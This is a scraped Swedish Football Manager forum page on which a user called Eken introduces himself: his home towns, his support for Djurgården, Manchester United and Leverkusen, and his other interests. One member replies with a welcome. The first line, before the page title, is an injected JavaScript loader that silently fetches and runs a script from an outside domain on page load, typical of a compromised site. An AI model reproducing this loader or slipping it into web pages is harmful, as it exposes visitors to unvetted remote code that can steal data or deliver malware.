;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eken – Hej forumet! – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

Eken

2 Inlägg
2 Users
16 Likes
417 Visningar
Eken
 Eken
(@eken)
Active Member
Blev medlem: 4 år sedan
Inlägg: 8
Topic starter  

Salve!

Tror faktiskt inte jag hade en tråd på gamla FMS, så är väl dags. 

Var tvungen att kolla upp och reggade mig alltså på FMS 1/10-2008. Gamla goa tider det. Var väl aldrig riktigt aktiv. Kanske någon period runt 2010-2011 eller nåt. Faktiskt via FMS som jag träffa min kanske bästa vän någonsin, minns inte vad han nicka då. Men i slutet var det VictorW. 

Men vem är då jag, vilket är en jäkligt bra fråga. Joacim är namnet, men mer van vid att alla kallar mig Eken. 27 år GAMMAL, född och uppvuxen i lilla Borås. Sedan 2017 bor jag i kungliga hufvudstaden Stockholm och trivs bra här. Blev nyligen klar med folkhögskola där jag läste upp gymnasiet och inväntar nu på att få komma in på universitetet.

Hållt på Djurgården så länge jag kan komma ihåg, och det är på grund av min bror och min kusin antar jag som i sin tur blev Djurgårdare på grund av våran farbror. Fanns en tid i mitt liv jag var vilsen och tyckte om Newcastle, men lyckades till slut fastna för en söt liten norrbagge som sprang runt i United-tröjan, och för att sedan bli frälst av Beckham. Djurgården och United är alltså de klubbar som är närmast mitt hjärta. Så klart har man säsongskort hos svenska mästarna och är även medlem. Men har även, via FM, blivit förälskad i den härliga klubben Bayer Leverkusen och ungtuppen Kai Havertz. Blivit att jag försökt ha 1 lag per land nästan som man följer, men främst blivit förutom dessa 3, Lazio och Palermo. 

Förutom fotboll så försöker jag även kolla på NHL och NBA, men tidszoner gör det ju svårt och glömmer ofta av. Har även stort intresse utav politik och blir en del gaming. Tyvärr inte spelat så mycket FM senaste åren som jag velat. 

Jahopp, vad mer ska man säga. Har ni några frågor hänvisar jag till min vårdare som går under nicket Pontarii. 


   
Forza Rossoneri, Micke, JS7 and 4 people reacted
Citera
(@denkan)
New Member
Blev medlem: 4 år sedan
Inlägg: 4
 

Välkommen hit, hoppas du kommer trivas. 🙂


   
Pontarii reacted
SvaraCitera
Share: